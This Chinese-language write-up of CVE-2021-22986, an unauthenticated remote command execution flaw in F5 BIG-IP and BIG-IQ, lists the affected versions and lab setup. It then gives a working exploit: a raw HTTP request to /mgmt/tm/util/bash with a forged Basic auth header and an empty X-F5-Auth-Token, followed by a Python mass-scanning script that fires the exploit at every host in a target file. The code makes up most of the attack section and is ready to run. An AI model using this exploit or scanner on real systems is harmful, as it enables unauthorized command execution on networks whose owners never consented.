F5 BIG-IP远程代码执行漏洞

漏洞简介

F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

该平台可在未登陆账号情况下执行系统命令。漏洞编号为CVE-2021-22986

影响范围

16.0.0 <= BIG-IP <= 16.0.1

15.1.0 <= BIG-IP <= 15.1.2

14.1.0 <= BIG-IP <= 14.1.3.1

13.1.0 <= BIG-IP <= 13.1.3.5

12.1.0 <= BIG-IP <= 12.1.5.2

7.1.0 <= BIG-IQ <= 7.1.0.2

7.0.0 <= BIG-IQ <= 7.0.0.1

6.0.0 <= BIG-IQ <= 6.1.0

漏洞复现

环境下载地址：

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

此处下载14.1.2.8版本

用vmware打开，账号密码为root/default，之后用config命令配置网络。

该平台默认用户名为admin，密码为系统root的密码，输入密码后并修改密码即可完成部署。

POC：

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.95.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: */*
Connection: close
Authorization: Basic YWRtaW46
X-F5-Auth-Token: 
Content-Length: 46
Content-Type: application/json

{"command": "run", "utilCmdArgs": "-c whoami"}

其中Authorization的值为系统的用户名，默认为admin的base64编码。X-F5-Auth-Token头是必加的。

批量检测：

import requests
import sys
import random
import re
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  使用格式:  python3 poc.py')
    print('+  File         >>> ip.txt')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/mgmt/tm/util/bash"
    headers = {
        "Authorization": "Basic YWRtaW46QVNhc1M=",
        "X-F5-Auth-Token": "",
        "Content-Type": "application/json"
    }
    data = '{"command":"run","utilCmdArgs":"-c id"}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=2)
        if "commandResult" in response.text and response.status_code == 200:
            print("目标 {}存在漏洞,响应为:{} ".format(target_url, json.loads(response.text)["commandResult"]))
        else:
            print("目标 {}不存在漏洞".format(target_url))
    except Exception as e:
        print("目标 {} 请求失败".format(target_url))

def Scan(file_name):
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "https://" + url
            url = url.strip('\n')
            try:
                POC_1(url)

            except Exception as e:
                print("请求报错".format(e))
                continue

if __name__ == '__main__':
    title()
    file_name  = str(input("Please input Attack File\nFile >>> "))
    Scan(file_name)